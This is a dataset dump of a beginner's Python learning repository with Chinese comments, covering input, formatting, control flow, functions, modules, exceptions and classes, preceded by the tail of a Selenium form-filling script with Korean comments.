time.sleep(2)\n st_obtpt = 'applyform_tmp_obtpt_'+list_r[4]\n driver.find_element_by_id(st_obtpt).click() ## 버튼클릭하기\n break\n except:\n print('학점선택 에러')\n time.sleep(1)\n continue\n print(list_r[0],\"중간확인\")\n while 1:\n try:\n print('성적확인1')\n driver.find_element_by_name(\n 'tmp_obtpovView'\n ).click() ## 버튼클릭하기\n print('성적확인2')\n if '0' in list_r[5]:\n list_r[5]=list_r[5][0:-1]\n elif 'S' in list_r[5]:\n list_r[5] = 'PASS'\n # st_obtpov = 'applyform_tmp_obtpov_'+list_r[5]\n st_obtpov = list_r[5]\n 
print('성적확인3',st_obtpov)\n time.sleep(3)\n driver.find_element_by_link_text(st_obtpov).click() ## 버튼클릭하기\n break\n except:\n print('성적선택 에러')\n time.sleep(1)\n continue\n time.sleep(2)\n driver.find_element_by_xpath('//*[@id=\"budiv_mySheet_AddMajdet\"]/a').click() #추가버튼 클릭\n\n\ngr_craw(s_id, s_pa)\ntime.sleep(2)\ndriver.find_element_by_name('abeektgtynView').click()\ntime.sleep(2)\ndriver.find_element_by_id('applyform_abeektgtyn_B').click()\ntime.sleep(2)\ndriver.find_element_by_xpath('//*[@id=\"budiv_mySheet_Save\"]/a')\n\n# f.close()\n# driver.close()\n# driver.quit()\n" } ]
2
Three-Y/MyPythonLearning
https://github.com/Three-Y/MyPythonLearning
1e32a465896fad2caf24fddf6c00d4e63e98d0eb
84c66632502b846f580cbd19781f7ec487e8b8ab
54862efb410ab30283cab76be3a1b2947296d4c0
refs/heads/master
2023-01-22T08:52:21.073278
2020-12-05T10:08:51
2020-12-05T10:08:51
316,262,068
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5560625791549683, "alphanum_fraction": 0.5782268643379211, "avg_line_length": 15.67391300201416, "blob_id": "badfb30ca0a6df2b60b69721786a6a75f8ea2da8", "content_id": "87b1cbc4caee946ccd13c69a88a77395fc3d6636", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 70, "num_lines": 92, "path": "/ibbie_40_异常.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n异常\n try:\n 不确定能否正确执行的代码\n except (异常1, 异常2):\n 若出现错误需要执行的代码\n except Exception as 变量名:\n 对未知错误的处理\n else:\n 没有异常才会执行的代码\n finally:\n 无论是否发生异常都会执行的代码\n\n 预判程序可能出现的异常,进行适当的处理,提高程序的健壮性\n 可以获取捕获的异常==>except Exception as 变量名:\n\n异常的传递\n 发生异常后,如果不进行处理,会抛给调用方,调用方不处理,会继续抛给调用方的调用方,以此类推,如果异常抛到主程序都没有被处理,程序终止\n\n主动抛出异常\n e = Exception(\"这里可以添加异常信息\") 创建异常对象\n raise e 抛出异常\n\"\"\"\n\"\"\"处理异常\"\"\"\ntry:\n num = int(input(\"请输入整数:\"))\nexcept:\n print(\"你的输入有误!\")\n\nprint(\"*\" * 20)\n\n\"\"\"根据异常类型进行不同的处理\"\"\"\ntry:\n x = int(input(\"请输入除数:\"))\n result = 666 / x\n print(\"666/%d\" % x)\nexcept ValueError:\n print(\"你的输入有误!\")\nexcept ZeroDivisionError:\n print(\"除数不能为0!\")\n\n\"\"\"获取异常\"\"\"\ntry:\n x = int(input(\"请输入除数:\"))\n result = 666 / x\n print(\"666/%d\" % x)\nexcept ValueError:\n print(\"你的输入有误!\")\nexcept Exception as result:\n print(result)\n\n\"\"\"else和finally\"\"\"\ntry:\n x = int(input(\"请输入除数:\"))\n result = 666 / x\n print(\"666/%d=%d\" % (x, result))\nexcept ValueError:\n print(\"你的输入有误!\")\nexcept Exception as result:\n print(result)\nelse:\n print(\"没有异常发生\")\nfinally:\n print(\"无论是否有异常都会执行\")\n\n\"\"\"异常的传递\"\"\"\ndef demo1():\n return int(input(\"请输入除数:\"))\n\ndef demo2():\n b = demo1()\n print(\"666/%d=%d\" % (b, 666 / b))\n\ntry:\n demo2()\nexcept Exception as e:\n print(\"未知异常:%s\" % e)\n\n\ndef input_psw():\n str = input(\"请输入密码:\")\n if len(str) > 8:\n print(\"输入成功\")\n else:\n e = Exception(\"密码长度不够!\")\n raise e\n\n\ntry:\n 
input_psw()\nexcept Exception as exc:\n print(exc)\n" }, { "alpha_fraction": 0.640625, "alphanum_fraction": 0.6640625, "avg_line_length": 18.69230842590332, "blob_id": "ab638d53a4678738d961176860157cbed6c1864e", "content_id": "fc79d36b93cc8148c03e04f0d84aecf1a6671ed3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "no_license", "max_line_length": 90, "num_lines": 13, "path": "/ibbie_05_接收输入与类型转换.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "# input()函数\ninput()\n\n# 显示输入信息,并将接收的数据赋给变量\n# input()的返回值是字符串\nprice = input(\"请输入单价:\")\ncount = input(\"请输入个数:\")\n# print(\"总价是:\"+price*count) # TypeError: can't multiply sequence by non-int of type 'str'\n# 需要进行类型转换才能进行计算\n\n# 类型转换\na = int(\"123\")\nb = float(\"123\")\n" }, { "alpha_fraction": 0.4571428596973419, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 17, "blob_id": "7c96631ad0aa2bceb4413cf0fb681714f3d4e032", "content_id": "b279dce2f2fff5b56e9fcb7601af9d18c2bbbb36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35, "license_type": "no_license", "max_line_length": 21, "num_lines": 2, "path": "/ibbie_43_package/test_package.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "def test43():\n print(\"test43()\")" }, { "alpha_fraction": 0.5342163443565369, "alphanum_fraction": 0.6048564910888672, "avg_line_length": 17.91666603088379, "blob_id": "7f9624dd0ba9cce55fa16d249aee040c0cc9a6e3", "content_id": "538d528ecd67b636dfde97b5ce24a392744e219e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 705, "license_type": "no_license", "max_line_length": 66, "num_lines": 24, "path": "/ibbie_06_变量的格式化输出.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n格式化字符\n %s 字符串\n %d 有符号的十进制整数,%06d表示显示6位数,不足补0\n %f 浮点数,%.2f表示保留两位小数\n 
%% 输出%\n %x 以十六进制的方式输出\n\nprint(\"格式化字符串\" % 变量1)\nprint(\"格式化字符串\" % (变量1,变量2,变量3...))\n\"\"\"\nname = \"ibbie\"\nprint(\"我叫%s\" % name) # 我叫ibbie\n\nstu_no = 123\nprint(\"我的学号是%06d\" % stu_no)\n\nprice = 2.5\nweight = 5\nmoney = price * weight\nprint(\"苹果的单价是%.2f/斤,一共%.2f斤,需要支付%.2f元\" % (price, weight, money))\n\nscale = 0.9999\nprint(\"你暴富的概率是%.2f%%\" % (scale * 100)) # 注意,若计算部分不加括号,会将字符串输出100遍" }, { "alpha_fraction": 0.6764705777168274, "alphanum_fraction": 0.6764705777168274, "avg_line_length": 16, "blob_id": "e27aae7a3f8bd1cf9691950fd958838deb871d41", "content_id": "e3a0a14916a154c4ec6bef51ada789294b3e0e2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 21, "num_lines": 2, "path": "/HelloPython.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "print(\"Hello Python\")\nprint(\"中文\")\n" }, { "alpha_fraction": 0.6450216174125671, "alphanum_fraction": 0.709956705570221, "avg_line_length": 18.33333396911621, "blob_id": "009f365e3144a91a2c923e39c5db8f6feb3676d7", "content_id": "45d7cdff749214384ee669de951ef6a809f6499f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 55, "num_lines": 12, "path": "/ibbie_44_导入包.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n导入包\n\"\"\"\n\nimport ibbie_43_package\n\nibbie_43_package.test_package.test43()\n\"\"\"\n因为ibbie_43_package的__init__.py中没有声明这个模块,所以无法调用\nCannot find reference 'test_package2' in '__init__.py' \n\"\"\"\n# ibbie_43_package.test_package2.test43_2()" }, { "alpha_fraction": 0.7077922224998474, "alphanum_fraction": 0.7337662577629089, "avg_line_length": 16.11111068725586, "blob_id": "c1e406ee52290f610544633f1d40ed4b027b9268", "content_id": "67fa075bb54260fa9ace530c52ae223511af482e", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "Python", "length_bytes": 590, "license_type": "no_license", "max_line_length": 66, "num_lines": 18, "path": "/ibbie_15_模块.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n模块的概念\n 模块就是一个工具包,导入对应的模块就能使用模块中的工具\n 每个py文件就是一个模块\n\n导入模块:import 模块名\n 注意:数字开头的模块名无法使用import关键字导入\n 如果解释器发现import关键字,会将对应的模块解释后的字节码文件放到__pycache__文件夹中,提升程序的速度\n\"\"\"\n\n# 导入模块\nimport ibbie_14_函数\nimport ibbie_03_变量\n\n# 调用其它模块的函数\nibbie_14_函数.print_star_heart()\n# 调用其它模块的变量\nprint(ibbie_03_变量.name)\n" }, { "alpha_fraction": 0.478658527135849, "alphanum_fraction": 0.5213414430618286, "avg_line_length": 17.22222137451172, "blob_id": "e512a8d74c761fed88114a89d6d26a05c0a0672e", "content_id": "2317825b778c0d95d677d5f0ddd8404a6d868674", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 42, "num_lines": 18, "path": "/ibbie_09_石头剪刀布.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "import random\n\n# 玩家\nplayer = int(input(\"请选择 石头(1)剪刀(2)布(3):\"))\n\n# 系统\nsys = random.randint(1, 3)\nprint(\"系统出的是 石头(1)剪刀(2)布(3):%d\" % sys)\n\n# 比较\nif (player == 1 and sys == 2) \\\n or (player == 2 and sys == 3) \\\n or (player == 3 and sys == 1):\n print(\"你赢了\")\nelif player == sys:\n print(\"平局\")\nelse:\n print(\"你输了\")\n" }, { "alpha_fraction": 0.5182978510856628, "alphanum_fraction": 0.559148907661438, "avg_line_length": 14.259739875793457, "blob_id": "f4a357ff4e5046f4dd47df2bb189c723cf9bdb1d", "content_id": "e0708af824a1f232db5faeeddf81f0f45614936f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1737, "license_type": "no_license", "max_line_length": 61, "num_lines": 77, "path": "/ibbie_14_函数.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n函数:具有独立功能的代码块,需要时调用\n\n格式:\n def 函数名(参数列表):\n 函数体\n return 
返回值\n\"\"\"\n\n# 定义函数 函数定义的上方建议保留两行空行\ndef print_star_heart():\n \"\"\"\n 此处是print_stat_heart的文档注释\n 在调用处使用快捷键ctrl+Q可以查看函数的文档注释\n \"\"\"\n j = 10\n while j >= 1:\n k = j\n while k >= 1:\n print(\"⭐\", end=\"♥\") # end=\"\"表示结尾不加任何东西,也可以指定其它符号\n k = k - 1\n print(\"\")\n j = j - 1\n\n\n# 调用函数\n# 调用必须在定义函数之后\nprint_star_heart()\n\n\n# 定义带参的函数\ndef sum_of(num1, num2):\n print(\"%d + %d = %d\" % (num1, num2, num1 + num2))\n\n\n# 调用带参的函数\nsum_of(10, 100)\n\n\n# 有返回值的函数\ndef sum_of_2(num1, num2):\n return num1 + num2\n\n\n# 调用有返回值的函数,接收函数的返回值\nresult = sum_of_2(100, 500)\n\n\n# 函数的嵌套调用\ndef test():\n print(\"**********我是test()的开始**********\")\n print_star_heart()\n sum_of(1,1)\n print(\"**********我是test()的结尾**********\")\n\n\ntest()\n\n\n# 多个返回值的函数\ndef test2():\n print(\"我是test2()\")\n # 可以使用元组返回多个数据\n return 1, \"haha\", {\"key1\": 666} # 如果返回的类型是元组,可以省略括号\n\n\ntest2_tuple = test2()\nprint(test2_tuple)\nprint(test2_tuple[0])\nprint(test2_tuple[1]) # 使用下标取值不方便\n\n# 如果需要接收多个返回值,同时需要单独处理每个返回值,可以使用多个变量接收返回值\n# 注意:变量的个数必须与返回值的个数一致\nnum, str2, dic = test2()\nprint(num)\nprint(str2)\nprint(dic)\n" }, { "alpha_fraction": 0.6352201104164124, "alphanum_fraction": 0.6540880799293518, "avg_line_length": 19, "blob_id": "5af344ec5dbc5cfaafd501a3576eec85a5bd658a", "content_id": "9e492c7fc9a9821204234d0e0cef8f34e2c47818", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 36, "num_lines": 8, "path": "/ibbie_46_pip安装第三方模块.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\npip安装\n pip是一个包管理工具\n 如果想要安装到python2.X的环境\n 安装:sudo pip install pygame\n 卸载:sudo pip uninstall pygame\n 如果想要安装到pyhong3.X的环境,改成==>pip3\n\"\"\"" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.4545454680919647, "avg_line_length": 8, "blob_id": "a20d214ca333d6993550774efce1739c7e270405", "content_id": "5e95cc8c47ce181b47893388866afdf6101d5f04", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 17, "num_lines": 5, "path": "/ibbie_38_属性查找机制.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n属性查找的顺序\n 向上查找机制\n 对象内部==>类属性==>\n\"\"\"" }, { "alpha_fraction": 0.582524299621582, "alphanum_fraction": 0.6019417643547058, "avg_line_length": 13.714285850524902, "blob_id": "b51390a4d3e789d1a2000567e3c292265e69a8aa", "content_id": "1420a46b639a87195b2c126888333e0bd3f1af28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 37, "num_lines": 7, "path": "/ibbie_04_字符串.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "# 使用\"+\"拼接字符串\na = \"ibbie\"\nb = \"yan\"\nprint(a+\".\"+b)\n\n# 使用\"*\"重复相同的字符串,除此以外,数值型和字符串不能进行其它的运算\nprint(a * 10)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 13.25, "blob_id": "5d8dc9c2276c341452597050445b5ecf554ebfc1", "content_id": "00acc801fc3b8b31836939716d0bb75be70d6975", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/ibbie_34_MRO方法搜索顺序.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\nMRO方法搜索顺序\n 类名.__mro__ 可以调用python提供的内置属性mro查看方法的调用顺序\n python查找方法的顺序是:本类==>父类(按声明顺序从左到右)==>Object类(python所有类的基类)\n\"\"\"\n\n\nclass Test:\n pass\n\n\nprint(Test.__mro__)\n" }, { "alpha_fraction": 0.4752066135406494, "alphanum_fraction": 0.8057851195335388, "avg_line_length": 59.75, "blob_id": "963c14d7605346daa0407de0569b2c7ce5ff07c5", "content_id": "1f2e260ecc88b5bf506659c1e577da1d3c2d2026", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 
242, "license_type": "no_license", "max_line_length": 176, "num_lines": 4, "path": "/readme.txt", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "***********Hello Python***********\nauthor:ibbie.yan\nemail:[email protected]\nphone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086" }, { "alpha_fraction": 0.5759999752044678, "alphanum_fraction": 0.6179999709129333, "avg_line_length": 12.184210777282715, "blob_id": "790db8accc1b6add97712256635f2574b87e66e6", "content_id": "6cc7403fc17a62aa5a731d5847e2aa5bb1db35c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 784, "license_type": "no_license", "max_line_length": 51, "num_lines": 38, "path": "/ibbie_03_变量.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "# 变量名 = 变量值\na = \"123\"\nprint(a)\n\nm = 1\nn = 2\nmn = m*n\nmn = mn + 10\nprint(mn)\n\n\"\"\"\npython中不需要声明变量类型\n会自动根据右边的数据推导出准确的类型\n在交互式运行中,可以使用type()可以查看某变量具体类型\n\"\"\"\nname = \"ibbie\" # str\nage = 1 # int\ngender = False # bool\nhigh = 1.58 # float\nweight = 95.0 # float,若不加\".0\"会是int\n\n\"\"\"\n数据类型\n\n数值型 :数值型之间可以相互进行运算\n 整型 int :在python2.x的时候还分int和long,python3.x后只有int\n 浮点型 float\n 布尔型 bool :若布尔型参与运算,true代表1,false代表0\n True 非0数\n False 0\n 复数型 complex 主要用于科学计算\n\n非数值型\n 字符串\n 列表\n 元组\n 字典\n\"\"\"" }, { "alpha_fraction": 0.5075445771217346, "alphanum_fraction": 0.5349794030189514, "avg_line_length": 12.254545211791992, "blob_id": "ae0bbb39c8db8128977de250ba40681979865e53", "content_id": "6322f6698bfdfa9fda2e23d5c44918c08df02356", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1091, "license_type": "no_license", "max_line_length": 56, "num_lines": 55, "path": "/ibbie_08_if语句与比较运算符.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": 
"\"\"\"\n比较运算符\n == 相等\n != 不等于\n > 大于\n < 小于\n >= 大于等于\n <= 小于等于\n\"\"\"\n\n\"\"\"\n逻辑运算符\n and : 条件1 and 条件2\n or : 条件1 or 条件2\n not : not 条件\n\"\"\"\n# if语句\n# if语句后缩进的内容都属于if符合条件后要执行的代码块中,没有缩进的部分则离开了if中的代码块,else同理\n\nage = 50\n\n# if\nif age < 25:\n print(\"你太幸福啦!\")\n print(\"哈哈哈哈\")\nprint(\"啦啦啦啦\") # 无论是否满足条件,此行都会执行\n\nsex = \"girl\"\n\n# if-else\nif sex == \"girl\":\n print(\"你是个可爱的女生\")\nelse: # else必须与if搭配使用\n print(\"你是个帅气的男生\")\n\n# if-elif\nif age < 18:\n print(\"你真可爱\")\nelif age < 25:\n print(\"你真漂亮\")\nelif age < 40:\n print(\"你真优雅\")\nelse:\n print(\"你永远18岁\")\n\n# if的嵌套\nif sex == \"girl\":\n print(\"你是个女生\")\n if age <= 18:\n print(\"你最漂亮\")\n else:\n print(\"你永远18岁\")\nelse:\n print(\"你是个男生\")\n print(\"你是永远的大猪蹄子\")\n" }, { "alpha_fraction": 0.5737265348434448, "alphanum_fraction": 0.5737265348434448, "avg_line_length": 11.032258033752441, "blob_id": "5839e093920e86c0a2f9fa7449540a2552311a06", "content_id": "c3ae163623880eccb046da8a7f63bea4655522f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 38, "num_lines": 31, "path": "/ibbie_36_多态.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n多态\n 不同的子类对象,调用相同的父类方法,产生不同的结果(同java,略)\n\"\"\"\n\n\nclass Animal:\n def eat(self):\n print(\"吃东西\")\n\n\nclass Dog(Animal):\n def eat(self):\n print(\"狗狗吃骨头\")\n\n\nclass Cat(Animal):\n def eat(self):\n print(\"猫猫吃鱼\")\n\n\nclass Master:\n def feed(self,animal):\n animal.eat()\n\n\ncat = Cat()\ndog = Dog()\nmaster = Master()\nmaster.feed(cat)\nmaster.feed(dog)\n" }, { "alpha_fraction": 0.5402061939239502, "alphanum_fraction": 0.6247422695159912, "avg_line_length": 15.724138259887695, "blob_id": "7eddc162b555d2214052308b538b097db7108a39", "content_id": "b93ee1fc1f10594b8e479709bfaf62e0518174a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 733, 
"license_type": "no_license", "max_line_length": 42, "num_lines": 29, "path": "/ibbie_37_类属性.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n类属性(类似java的静态属性,但不完全相同)\n 类名.类属性\n 对象.类属性(不推荐,容易混淆,造成误解)\n 若使用 对象.类属性=值 进行赋值操作,只会给对象增加属性,而不会修改类属性\n\"\"\"\n\n\nclass Demo:\n count = 0 # 记录创建了多少个对象\n\n def __init__(self):\n # 每创建一个对象count+1\n Demo.count += 1\n\n\nd1=Demo()\nd2=Demo()\nd3=Demo()\nd4=Demo()\nd5=Demo()\nprint(Demo.count) # 5\nd5.count += 1 # 尝试使用对象修改类属性\nprint(Demo.count) # 5 类属性不变\nprint(d5.count) # 6 对象属性\n\n\"\"\"两个count不是同一个东西\"\"\"\nprint(id(d5.count)) # 1632908634576\nprint(id(Demo.count)) # 1632908634544\n" }, { "alpha_fraction": 0.2886597812175751, "alphanum_fraction": 0.34020617604255676, "avg_line_length": 16.321428298950195, "blob_id": "b09f570fcd5393594524519fe33f5498c7998fc0", "content_id": "55d44ec13a1775b5454dee5f574433cbf56bb892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 42, "num_lines": 28, "path": "/ibbie_11_赋值运算符.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n赋值运算符\n = a = b + c\n += a += b 表示 a = a + b\n -= a -= b 表示 a = a - b\n *= a *= b 表示 a = a * b\n /= a /= b 表示 a = a / b\n //= a //= b 表示 a = a // b (//表示整除)\n %= a %= b 表示 a = a % b\n **= a **= b 表示 a = a ** b\n\"\"\"\ni = 1\ntotal = 0\nwhile i <= 100:\n total += i\n i += 1\n\nprint(\"1到100所有整数的和是:%d\" % total)\n\nj = 1\ntotal1 = 0\nwhile j <= 100:\n if j % 2 == 0:\n total1 += j\n\n j += 1\n\nprint(\"1到100所有偶数的和是:%d\" % total1)\n" }, { "alpha_fraction": 0.7217898964881897, "alphanum_fraction": 0.7587548494338989, "avg_line_length": 21.30434799194336, "blob_id": "3458c964aabaac28ce314b9716ef7d6f1b61d0aa", "content_id": "c306008f5ce273c29a28e6b0b1a471c252db0a1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 968, "license_type": 
"no_license", "max_line_length": 61, "num_lines": 23, "path": "/ibbie_41_import.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "import ibbie_37_类属性 # 导入模块\nimport ibbie_39_类方法和静态方法 as ibbie39 # 导入模块并为模块起别名,方便后续调用\nfrom ibbie_40_异常 import input_psw # 导入模块中指定的工具\nfrom ibbie_14_函数 import * # (不推荐使用)表示导入模块的全部工具,但是后续调用无需带上模块名\nimport ibbie_42_内置属性name\n\n\"\"\"\n注意:假如使用from import导入不同模块的同名工具,后导入的会覆盖前面导入的\n可以使用 as 起别名,加以区分\n\"\"\"\n\n\"\"\"\n注意:import导入模块时,会将模块中的直接可执行的代码也执行一遍\n可以使用__name__属性,加入适当的判断,使代码不会被执行,详见:ibbie_42_内置属性name\n\"\"\"\n\n# 使用 “模块名.” 调用模块的工具\nibbie_37_类属性.Demo()\n# 使用模块的别名调用模块的工具\nibbie39.Tool()\n# 使用from xxx import xxx的工具可以直接调用\ninput_psw()\ntest2()\n\n" }, { "alpha_fraction": 0.6416666507720947, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 14.041666984558105, "blob_id": "ff8ea91da6694f34c8ae196a92799406a3bbe8ac", "content_id": "f54af33beace7ffa4d035671dbf2e4e285daf728", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 650, "license_type": "no_license", "max_line_length": 35, "num_lines": 24, "path": "/ibbie_48_编码.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\nASCII编码\n 早期使用的编码,只有256个字符,每个字符占1字节\nUNICODE编码\n 几乎涵盖了全世界所有的字符\n UTF-8,是UNICODE的一种\n 使用1-6个字节表示一个字符\n 大多数汉字使用3个字节表示\n\nPython2.X默认使用ASCII\nPython3.X默认使用UTF-8\n\n可以在文件开头指定编码\n 添加注释:# *-* coding:utf8 *-*\n 或:# coding=utf8\n\npython2.X会将中文字符切成3个1个字节的字符输出,就会导致乱码\n 可以在字符串前加一个u,表示这是一个utf-8编码的字符串\n\"\"\"\n\nstr = u\"我是一条字符串\"\n\nfor c in str:\n print(c)" }, { "alpha_fraction": 0.5428571701049805, "alphanum_fraction": 0.54666668176651, "avg_line_length": 14.028571128845215, "blob_id": "84a49f93c9e05a35e7ae543e8b03dc7f9cb0a8ce", "content_id": "46c307e6ff9ee2095a1b618b7268653d8c6d124a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 825, "license_type": "no_license", "max_line_length": 38, "num_lines": 35, 
"path": "/ibbie_32_父类的公有属性和方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n父类的公有属性和方法\n 子类可以调用父类的公有属性和方法\n 子类对象也可以调用父类的公有属性和方法\n 可以通过父类的公有方法,在子类间接调用父类的私有属性和方法\n\"\"\"\n\n\nclass A:\n def __init__(self):\n self.a = \"父类公有属性\"\n self.__b = \"父类的私有属性\"\n\n def test(self):\n print(\"父类公有方法\")\n print(\"父类的公有方法中调用父类的私有属性和方法:\")\n print(self.__b)\n self.__test2()\n\n def __test2(self):\n print(\"父类私有方法\")\n\n\nclass B(A):\n def demo(self):\n # 子类调用父类的公有属性和方法\n print(self.a)\n self.test()\n\n\nb = B()\nb.demo()\n# 子类对象调用父类的公有属性和方法\nprint(b.a)\nb.test()" }, { "alpha_fraction": 0.6011779308319092, "alphanum_fraction": 0.6255784630775452, "avg_line_length": 18.32520294189453, "blob_id": "4bcc24abf0197be59605dbefefe543141b48a295", "content_id": "4bdd0ffd64c960016bda7cd0e75901d67cadf22b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3707, "license_type": "no_license", "max_line_length": 72, "num_lines": 123, "path": "/ibbie_24_函数的变量.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n函数的变量\n 在函数内部,对传递进来的参数进行赋值操作,无论是否是可变数据类型,都不会修改函数外部的变量\n 对于可变数据类型,在函数内部使用方法进行修改,修改效果能作用到函数外\n\n关于列表的+=操作\n 对list使用+=,本质上是执行extend方法:list.extend(list)\n\n函数缺省参数的默认值\n 可以在函数的参数列表,对参数设置默认值,如果没有传递对应的参数,直接使用参数的默认值\n 设置了默认值的参数(也就是可以缺省的参数),必须放在参数列表的末尾\n 如果有多个参数设置了默认值,调用函数时,如果想对指定参数赋值,要加上参数名称\n\n多值参数\n 参数名前加*,表示参数是元组,一般习惯元组参数表示成 **args\n 参数名前加**,表示参数是字典,一般习惯将字典参数表示成 **kwargs\n 不加*也可以对函数传递元组,但调用时需要给参数加上(),而函数参数加了*则可以省略()\n 元组和字典的拆包:\n 给函数的参数加上*或**后,调用时无需给参数加上()或{},简化了函数的调用,称为拆包\n\"\"\"\ngl_num = 99\ngl_num_list = [1, 2, 3]\n\n\ndef demo1(num, num_list):\n \"\"\"使用赋值操作修改传递进来的参数(可变+不可变)\"\"\"\n print(\"demo1内,修改前:\")\n print(num)\n print(num_list)\n num = 10\n num_list = [4, 5, 6]\n print(\"demo1内,修改后:\")\n print(num)\n print(num_list)\n\n\ndemo1(gl_num, gl_num_list)\nprint(\"修改后,函数外部:\")\nprint(gl_num)\nprint(gl_num_list)\n\n\ndef demo2(num_list):\n 
\"\"\"使用方法修改传递进来的参数(可变数据类型)\"\"\"\n print(\"demo2内,修改前:\")\n print(num_list)\n num_list.append(666)\n print(\"demo2内,修改后:\")\n print(num_list)\n\n\ndemo2(gl_num_list)\nprint(\"修改后,函数外:\")\nprint(gl_num_list)\n\n\ndef demo3(num_list):\n \"\"\"使用+=运算符\"\"\"\n print(\"在demo3内,使用+=前:\")\n print(num_list)\n num_list += num_list\n print(\"在demo3内,使用+=后:\")\n print(num_list)\n\n\ndemo3(gl_num_list)\nprint(\"使用+=后,函数外部:\")\nprint(gl_num_list) # 函数外部list也发生了变化,说明+=运算符执行的不是list = list + list的赋值操作\n\n\ndef demo4(name, is_rich=True):\n \"\"\"给参数设置默认值,设置了默认值的参数可以缺省\"\"\"\n if is_rich:\n answer = \"必须的!\"\n else:\n answer = \"恐怕要再努力点~\"\n print(\"%s会变成有钱人吗?%s\" % (name, answer))\n\n\ndemo4(\"ibbie\")\ndemo4(\"傻猪猪\", False)\n\n\ndef demo5(name, title=\"打工人\", is_hard=True):\n \"\"\"给多个参数设置默认值\"\"\"\n if is_hard:\n answer = \"很努力!\"\n else:\n answer = \"恐怕要再努力点~\"\n print(\"%s是个%s,会变成有钱人吗?%s\" % (name, title, answer))\n\n\ndemo5(\"小明\", is_hard=False) # 跳过title,给is_hard参数赋值,需要带上参数名\n\n\ndef demo6(num, *args, **kwargs):\n \"\"\"多值参数\"\"\"\n print(num)\n print(args)\n print(kwargs)\n\n\ndemo6(1, 2, 3, 4, 5, name=\"ibbie\", gender=False)\n# 1分给了num参数,其它数字给了args,键值对给了kwargs\n# 1\n# (2, 3, 4, 5)\n# {'name': 'ibbie', 'gender': False}\n\n\ndef demo7(args):\n temp_total = 0\n for i in args:\n temp_total = temp_total + i\n\n return 